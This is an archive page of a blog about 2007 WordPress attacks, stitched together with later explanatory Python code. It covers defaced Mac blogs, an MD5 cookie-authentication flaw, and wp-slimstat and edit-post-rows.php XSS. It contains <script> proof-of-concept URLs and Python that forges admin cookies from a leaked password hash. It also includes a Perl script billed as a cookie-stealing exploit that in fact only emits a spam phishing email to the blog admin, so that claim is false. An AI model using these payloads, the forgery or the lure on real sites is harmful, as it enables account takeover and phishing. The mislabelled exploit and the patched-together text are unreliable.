XSS Worm : Cross Site Scripting & Web 2.0 Security

Application Vulnerability Information Portal

Archive for the 'Wordpress Exploits' Category


Mac sites are being hacked by blackhat XSS hackers

Posted by xssworm on 23rd November 2007

Several Mac-focused blogs have recently been defaced by attackers using unpatched ("0day") WordPress exploits that the victims describe as cross-site scripting. Keep in mind the question a reader raises further down: writing to .htaccess from a query string implies a server-side file-write hole, which XSS, running in the victim's browser, does not by itself provide.

[Image: MacApper Hacked]

One victim, Miles Evans of MacApper.com, writes:

“I took the liberty of analyzing the hack a bit in the hopes it helps others prevent this from happening to them. Although we had updated our blog to the latest version of Wordpress, near as I can tell the hack was accomplished via an XSS (cross site scripting) exploit. By executing some malicious code in the query string the hacker was able to write to our .htaccess file the following:

#this is for rotten mac fanbois - suck it down.
#RewriteRule ^divider.png$ /rotten/divider.png [L]
#RewriteRule ^rotten.jpg$ /rotten/rotten.jpg [L]
#RewriteCond %{REQUEST_URI} !^/rotten.*
#RewriteRule !rotten/index.html$ /rotten/index.html [L]

The problem is that the exploit appears to be unknown to Wordpress as far as I can see (I will be reporting it to them), so other Wordpress blogs may be susceptible. I wish I could offer more help.”

“[…] By default WP wants to handle the .htaccess file dynamically so it needs to be set world writable. We tweaked this before putting the blog back online and we should be safe now. If anyone needs a hand feel free to email me (milesevans _AT_ macapper.com).”

Loweded Wookie adds some helpful technical feedback for advanced Mac users:

“When I was using XOOPS I got hacked once but all the little retard did was create a file called index.html. All I did was alter the Apache file so that PHP files were executed before HTML files and any hack after that from little brained people would have been thwarted. Any further attempts to hack WordPress are thwarted by a simple permissions change. Of course .Mac accounts are different because the hacker would first have to find your machine, intercept the Kerberos encrypted password (yeah, good luck on that one), and then do some damage. Considering many .Mac pages are edited using iWeb then any hacked pages would be up for a grand total of… however long it takes to upload to .Mac. Hell, comment floods can be removed simply by clicking the comment box and hitting delete in iWeb.”

Another reader, Chris, asks the very question that came into our mind as we read this report:

“To even GET data to the server, it would have to be a type 2 attack. I doubt this was overlooked in the release of WordPress 2.3.1, since the primary release was for security. Secondly, the vulnerable page would have to be a publicly accessible page, making a type 2 XSS even more rare. Finally, why would you possibly leave your HTACCESS file world-writable, and how would this “hacker” write files back to your server using a type 2 exploit anyways? At most it could be redirected to another site. Please explain.”

Wookie offers more technical advice:

“It’s more common than you know. This was something that needed to be done on older versions of XOOPS. It had to have at least administrator rights to access the file but the passwords etc are all plain text so it’s reasonably easy to hack a PHP based content management system and WordPress is no exception.”

Another Macintosh blog, GlenWolsey.com (a Mac blog hosted on blogspot), has been taken down by the same kind of attacker. The technique reported for this attack was again a WordPress "XSS" used to overwrite a world-writable .htaccess file.

A quote from the hacked site: “This website has been flagged for excessive Apple fanboism, and has been taken down for 24 hours. This is a message to the rest of the Mac community, so listen up. Ever heard of hubris? Tone it down, and you will not be attacked. Everyone else is open game.”

The attacker, who goes by Malcor, has posted several threats on his own blog:

“The target will be posted on this site once the attack begins. I will be sending said target a note with a heads up before. Hopefully, by the end of the attack, a sea change will begin to happen. Does anyone disagree with me that the Mac world be a much more pleasant place if smugness wasn’t tolerated?”

“The attacks will be untraceable, and unstoppable.”

Source: http://malcor.blogspot.com
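The defacement described above comes down to two things an administrator can check for directly: an .htaccess that is writable by everyone, and rewrite rules that send requests to a page WordPress never wrote. The following is an added example (not code from the post or from anyone quoted in it) that audits an .htaccess for both. The sample .htaccess is constructed for the example: WordPress's stock rewrite block followed by the rules quoted by Miles Evans, uncommented so that they are active. EXPECTED_TARGETS, the set of substitutions a stock WordPress .htaccess uses, is an assumption of the example.

```python
import os
import re
import stat

# Stock WordPress rewrite block (the only rules a clean install writes itself).
STOCK_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# The rules quoted in the post, made active (constructed sample, not a real file).
DEFACEMENT_RULES = """\
#this is for rotten mac fanbois - suck it down.
RewriteRule ^divider.png$ /rotten/divider.png [L]
RewriteRule ^rotten.jpg$ /rotten/rotten.jpg [L]
RewriteCond %{REQUEST_URI} !^/rotten.*
RewriteRule !rotten/index.html$ /rotten/index.html [L]
"""

SAMPLE_HTACCESS = STOCK_HTACCESS + DEFACEMENT_RULES

# Substitutions a stock WordPress .htaccess is expected to contain (assumption).
EXPECTED_TARGETS = {"-", "/index.php", "index.php"}

# RewriteRule <pattern> <substitution> [flags]
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.IGNORECASE)


def foreign_rewrite_rules(text):
    """Return (line_no, pattern, substitution) for every active RewriteRule whose
    substitution is not one WordPress writes itself. Commented lines are inert."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        match = REWRITE_RULE.match(line)
        if match and match.group(2) not in EXPECTED_TARGETS:
            findings.append((line_no, match.group(1), match.group(2)))
    return findings


def is_world_writable(mode):
    """True when the 'other' write bit is set, e.g. 0o666 or 0o777."""
    return bool(mode & stat.S_IWOTH)


def audit_htaccess(text, mode):
    """Combine both checks into one report for a file's content and mode bits."""
    return {
        "world_writable": is_world_writable(mode),
        "foreign_rules": foreign_rewrite_rules(text),
    }


def audit_file(path):
    """Run the audit against a real .htaccess on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_htaccess(fh.read(), os.stat(path).st_mode)


if __name__ == "__main__":
    report = audit_htaccess(SAMPLE_HTACCESS, 0o666)
    print("world writable:", report["world_writable"])
    for line_no, pattern, target in report["foreign_rules"]:
        print(f"line {line_no}: RewriteRule {pattern} -> {target}")
```

On a live install, run audit_file("/path/to/wordpress/.htaccess"). WordPress rewrites the file from PHP, so the web server's own user needs write access; that does not require the "other" write bit that the quoted advice sets.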


Posted in 0day exploits, Blackhat Hackers, Cross Site Scripting, Type 2 Attacks, Type 2 Exploits, Type 2 XSS, Wordpress Exploits, Wordpress Hacking | 82 Comments »

Wordpress 0day: Hacking into computers now easier than previously believed, says Heise Security

Posted by xssworm on 20th November 2007

“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system. Most content management systems and blogs save user passwords as hashes in the underlying database. So even if attackers were to get access to the hashes stored in the database, for instance by means of an SQL injection hole, they have not been able to do much with them up to now.”

http://en.wikipedia.org/wiki/Password_Cracking

“Specifically, if they want to recover the passwords, they would have to compare a hash with entries in a “rainbow table” – a process that can take some time and may not work at all for long passwords, for which there simply are no tables.”

“But according to a security advisory published by Stephen J. Murdoch of the University of Cambridge, a property in WordPress can be exploited to get access without the password. Instead of trying to obtain the password, Murdoch used its hash to generate an authentication cookie to gain access to the system. A member of the core team behind The Onion Router (TOR) anonymization project, Murdoch says that the MD5 hash only has to be hashed a second time with MD5. According to his report, the authentication procedure implemented in WordPress then looks like:

wordpresspass_<MD5(url)>=MD5(user_pass)

Here, the URL is clearly spelled out, and user_pass corresponds to the hash (MD5(password)). Along with the wordpressuser cookie (that wordpressuser_<MD5(url)>=admin), access is then reportedly provided to the WordPress admin account. Murdoch says he has informed the developers of WordPress of the problem, but they have yet to react.”

http://en.wikipedia.org/wiki/HTTP_cookie

Ed Henning

The flaw matters for WordPress 2.3 because it turns a password-hash disclosure into a login. An attacker who can read the users table through some other hole (an SQL injection, for example) does not need to crack the MD5 hashes, create new users, modify existing ones, or plant a backdoor: the stored user_pass value is all that is needed to compute the wordpresspass cookie and be accepted as that user, including the administrator. Note that the stored values are hashes, not encrypted passwords, and that the cookie is only a second, unkeyed MD5 of the stored hash, so a database dump is itself the credential. Users are encouraged to upgrade as soon as a fix is released. See more:
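To make the advisory's formulas concrete, here is an added Python example (not WordPress's PHP, and not code from Heise or Murdoch) that builds the two cookies exactly as quoted above: the cookie name suffix is MD5 of the blog URL, and the wordpresspass value is MD5 of the stored user_pass, which is itself MD5 of the password. Because the server recomputes MD5(user_pass) from the database, a leaked user_pass is enough to forge a cookie the server accepts. The last two functions sketch the direction a fix has to take, mixing a server-side secret into the cookie with an HMAC; that scheme is an illustration only, not what WordPress later shipped. The site URL, user table and server key are constructed for the example.

```python
import hashlib
import hmac


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode()).hexdigest()


def wp23_stored_hash(password: str) -> str:
    """WordPress 2.3 keeps MD5(password) in the user_pass column."""
    return md5_hex(password)


SITE_URL = "http://example.com"                      # assumed blog URL (constructed)
USER_DB = {"admin": wp23_stored_hash("hunter2")}     # constructed users table: name -> user_pass
SERVER_KEY = b"constructed-server-secret"            # used only by the keyed variant


def wp23_login_cookies(site_url: str, username: str, password: str) -> dict:
    """Cookies WordPress 2.3 sets after a successful password login
    (format as quoted from Murdoch's advisory above)."""
    suffix = md5_hex(site_url)
    return {
        f"wordpressuser_{suffix}": username,
        f"wordpresspass_{suffix}": md5_hex(wp23_stored_hash(password)),
    }


def wp23_forge_cookies(site_url: str, username: str, leaked_user_pass: str) -> dict:
    """What an attacker holding only the user_pass hash (no password) can build."""
    suffix = md5_hex(site_url)
    return {
        f"wordpressuser_{suffix}": username,
        f"wordpresspass_{suffix}": md5_hex(leaked_user_pass),
    }


def wp23_server_accepts(site_url: str, cookies: dict, users: dict) -> bool:
    """Server side of the 2.3 scheme: recompute MD5(user_pass) for the named user
    and compare it with the cookie. Nothing here is secret beyond the database."""
    suffix = md5_hex(site_url)
    user = cookies.get(f"wordpressuser_{suffix}")
    presented = cookies.get(f"wordpresspass_{suffix}")
    if user not in users or presented is None:
        return False
    return hmac.compare_digest(presented, md5_hex(users[user]))


def keyed_cookie(site_url: str, username: str, user_pass: str, server_key: bytes) -> dict:
    """Illustrative fix direction (assumption, not WordPress code): bind the cookie
    to a server-side key, so a database dump alone cannot reproduce it."""
    suffix = md5_hex(site_url)
    tag = hmac.new(server_key, f"{username}|{user_pass}".encode(), hashlib.sha256).hexdigest()
    return {f"wordpressuser_{suffix}": username, f"wordpresspass_{suffix}": tag}


def keyed_server_accepts(site_url: str, cookies: dict, users: dict, server_key: bytes) -> bool:
    suffix = md5_hex(site_url)
    user = cookies.get(f"wordpressuser_{suffix}")
    if user not in users:
        return False
    expected = keyed_cookie(site_url, user, users[user], server_key)[f"wordpresspass_{suffix}"]
    return hmac.compare_digest(cookies.get(f"wordpresspass_{suffix}", ""), expected)


if __name__ == "__main__":
    forged = wp23_forge_cookies(SITE_URL, "admin", USER_DB["admin"])
    print("forged from hash only:", forged)
    print("2.3 server accepts forged cookie:", wp23_server_accepts(SITE_URL, forged, USER_DB))
    print("keyed server accepts forged cookie:", keyed_server_accepts(SITE_URL, forged, USER_DB, SERVER_KEY))
```

The forged cookie and the one a genuine login produces are byte-for-byte identical, which is the whole finding: the server never checks anything the attacker does not already hold.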

Sources:

http://heise-security.co.uk/ - Security and Internet Security Expert Consultants.

http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt

Posted in 0day exploits, Cross Site Cooking, Cross Site Request Forging, Cross Site Scripting, Reflective XSS Hacking, Web Application Security, Wordpress Exploits, Wordpress Hacking, XSS Worm | 57 Comments »

0day injection exploit for Wordpress 2.3 - xssworm.com - all versions vulnerable with no patch

Posted by xssworm on 13th November 2007

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious hole in WordPress 2.3 with the wp-slimstat 0.92 plugin that a blackhat can use for cross-site scripting against the WordPress administrator, stealing the cookies of the blog admin ("blogmin"). The attack is called 0day because it is being published today with no patch available.

Below is a demonstration attack against the WordPress install at http://xssworm.blogvis.com. Please do not use it for your own attacks, as there is no patch for this exploit. The XSSWorm admin has been alerted and is watching for suspicious clicks (-;

[Screenshot of the XSS proof of concept]

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

The attack is aimed at the blog administrator: the injected script steals the admin's session cookie, which is then used to take over the blog. Exploit code for this bug is included below.

We have looked at the wp-slimstat code but cannot see a problem with its input validation. Perhaps some xssworm.com readers can show us where the problem in the PHP code is, because we cannot see one here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
'.(!empty($myFilterString)?'— <a href="?page='.$_GET['page'].'&panel='.$_GET["panel"].'">'.__('Reset filters', 'wp-slimstat').'</a>':'').'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET["panel"].'" />
<input type="hidden" name="fd" value="'.$_GET["fd"].'" /></form>';

–snips

The programmer concatenates $_GET values from the user straight into the HTML output. PHP performs no automatic validation or filtering of $_GET, so $_GET['page'], $_GET['panel'] and $_GET['fd'], which go into an href and into value="..." attributes without htmlspecialchars(), are reflected as-is: a double quote in any of them closes the attribute and whatever follows is rendered as markup. The ff and ft parameters, by contrast, pass through intval() and cannot carry script.

Exploit code (Perl) for whitehats is included here:

# Wordpress 2.3 0day exploit - http://xssworm.com
#
# A bug exists in wordpress 2.3 (wp-slimstat) that allows an attacker
# to steal the blog cookie from the wordpress blog admin.
#
# To exploit the scripting bug the attacker makes a link to the
# slimstat URL carrying XSS shellcode and gets the blog admin to
# follow it, e.g. by embedding it in a phishing email or behind an
# otherwise interesting link. The attacker can also embed it in a
# referer or trackback to inject script into the wordpress dashboard,
# or make the admin visit a malicious resource when viewing his own blog.
#
#
# Status: not patched, published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instructions:
# To run this exploit you need perl (any unix/linux or Windows perl will do).
#
# Usage:
#
#   perl wordpress-2.3-0day-xss-injection-bug.pl
#
# The script prompts for target information and prints an SMTP
# transcript that delivers the lure to the admin.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS::Simple;
#use Math;
use Socket;

print "Welcome. What is the target email address of the wordpress blog admin: \n";
my $target = <STDIN>;
chomp($target);                       # strip the newline so the address fits inside <...>
print "ok target is $target\n";
sleep(3);
print "ok What is the address of the wordpress blog: \n";
sleep(5); my $address = <STDIN>;
chomp($address);
print "ok address is $address\n";
sleep(6);
# print "testing";
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n -- CUT OUTPUT HERE -- \n\n";
# SMTP transcript to paste into a mail server session ('@' is escaped so
# perl does not interpolate it as an array)
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <xssworm\@hotmail.com>\n";
print "RCPT TO: <$target>\n";
print "DATA\n"; print "Free x picture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n -- END OF OUTPUT CUT HERE --\n";
print "";
print "Ok now you need to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj\@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on";
#print "XSS initialized";
#payload
sleep(1); exit(0);
# snips
#

Please note that, as far as we can see, wp-slimstat contains no code-injection or SQL-injection vector; what this XSS gives an attacker is cookie theft in the admin's browser, not server-side injection.

Many thanks for your comments on this vulnerability in WordPress 2.3 with wp-slimstat 0.92.

Thanks vaj

Posted in 0day exploits, Application Security, Black Hat Hacking, Cross Site Request Forging, Cross Site Scripting, How to Hack, Howto XSS Hack, Reflective XSS Hacking, Vulnerable Source Code, Web Application Security, Wordpress Exploits, Wordpress Hacking | 21 Comments »

Hacker releases exploits for Wordpress 2.3 with XSS (Cross Site Scripting) Attack

Posted by xssworm on 9th November 2007

Title of XSS Vulnerability:  [waraxe-2007-SA#059] - XSS in WordPress 2.3

Credit of XSS Discovery: Janek Vind “waraxe”
XSS Discovery Date: 27. October 2007
XSS Discovery Location: Estonia, Tartu
Web address for XSS security alert: http://www.waraxe.us/advisory-59.html

Image Placeholder

Description of XSS Exploit:

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability, at the expense of security.

To run WordPress your host just needs a couple of things:

PHP version 4.2 or greater
MySQL version 4.0 or greater

Technical XSS Information: Cross-Site Scripting (XSS) in “edit-post-rows.php”

WARAXE writes: Let's have a look inside "/wp-admin/edit-post-rows.php":

[start of section of source code with XSS exploit for wordpress]

<?php foreach($posts_columns as $column_display_name) { ?>
<th scope="col"><?php echo $column_display_name; ?></th>
<?php } ?>

[end of vulnerable source code section]

As we can see, the array "posts_columns" is uninitialized, and if we execute this PHP script directly, an arbitrary value for that variable can be delivered. This means that reflective XSS exists here.

And of course register_globals must be on for this “exploit” to be successful.

XSS proof of concept:

http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script>

The information above has been provided by the website of WARAXE.US
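Both XSS cases in these two posts are the same defect: a request value is concatenated into HTML output without escaping. The wp-slimstat snippet echoes $_GET['page'], $_GET['panel'] and $_GET['fd'] into an href and into value="..." attributes (ff and ft go through intval() and cannot carry markup, so a payload in ft, as in that post's PoC URL, does not fire), and edit-post-rows.php echoes whatever register_globals placed into $posts_columns[] straight into <th> cells. The following is an added example, written in Python rather than the plugin's PHP and not code from either advisory, that rebuilds both output fragments from a URL, first as the original code does and then escaped the way htmlspecialchars($s, ENT_QUOTES) would (html.escape(..., quote=True) in Python). The php_get() helper, the intval() emulation and the PoC URLs are constructed for the example; the hosts in them are placeholders.

```python
import html
import re
from urllib.parse import unquote_plus


def php_get(url: str) -> dict:
    """Approximate PHP's $_GET for a URL: split the query on '&' only, last value
    wins for a repeated scalar key, and 'k[]=v' collects into a list under 'k'."""
    query = url.split("?", 1)[1] if "?" in url else ""
    out = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        key, value = unquote_plus(key), unquote_plus(value)
        if key.endswith("[]"):
            out.setdefault(key[:-2], []).append(value)
        else:
            out[key] = value
    return out


def intval(value) -> int:
    """Mimic PHP intval() on a string: optional sign and leading digits, else 0."""
    match = re.match(r"\s*[+-]?\d+", str(value))
    return int(match.group()) if match else 0


def _encoder(escape: bool):
    # html.escape(quote=True) is the Python counterpart of htmlspecialchars(ENT_QUOTES)
    return (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)


def slimstat_fragment(get: dict, escape: bool) -> str:
    """Rebuild the wp-slimstat output from the findstr snippet, given a $_GET dict."""
    enc = _encoder(escape)
    ff, ft = intval(get.get("ff", "")), intval(get.get("ft", ""))   # integers, never markup
    page, panel, fd = (enc(get.get(k, "")) for k in ("page", "panel", "fd"))
    return (f'<a href="?page={page}&panel={panel}">Reset filters</a>'
            f'<input type="hidden" name="page" value="{page}" />'
            f'<input type="hidden" name="panel" value="{panel}" />'
            f'<input type="hidden" name="fd" value="{fd}" />'
            f'<!-- ff={ff} ft={ft} -->')


def post_rows_header(get: dict, escape: bool) -> str:
    """edit-post-rows.php's <th> loop; with register_globals on, $posts_columns is
    whatever posts_columns[] the query string supplied (the waraxe case)."""
    enc = _encoder(escape)
    columns = get.get("posts_columns", [])
    return "".join(f'<th scope="col">{enc(c)}</th>' for c in columns)


def contains_script(rendered: str) -> bool:
    """Crude success check for the PoCs: a raw <script> tag reached the page."""
    return "<script>" in rendered


# Constructed PoC URLs (placeholder hosts, not real sites).
POC_FT = ("http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php"
          "?panel=1&fi=/feed/&ff=1&ft=<script>alert(1)</script>")      # payload in ft: intval()'d away
POC_PANEL = ("http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php"
             '&panel="><script>alert(1)</script>')                      # payload in panel: reflected raw
POC_POSTS_COLUMNS = ("http://victim.com/wp-admin/edit-post-rows.php"
                     "?posts_columns[]=<script>alert(123);</script>")   # register_globals case


if __name__ == "__main__":
    cases = (("slimstat ft", POC_FT, slimstat_fragment),
             ("slimstat panel", POC_PANEL, slimstat_fragment),
             ("edit-post-rows", POC_POSTS_COLUMNS, post_rows_header))
    for name, url, render in cases:
        get = php_get(url)
        print(f"{name:15s} script lands unescaped: {contains_script(render(get, False))!s:5s} "
              f"escaped: {contains_script(render(get, True))}")
```

The escaped variant is the fix in both files: every $_GET value (and, with register_globals on, every global that a request can populate) must go through htmlspecialchars() before it is echoed, whether into an attribute or into element content.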

Posted in Reflective XSS Hacking, Vulnerable Source Code, Web 2.0 Worms, Web Application Security, Whitehat hackers, Wordpress Exploits, Wordpress Hacking, XSS Hacking Video, XSS Security Alerts, XSS Worm | 6 Comments »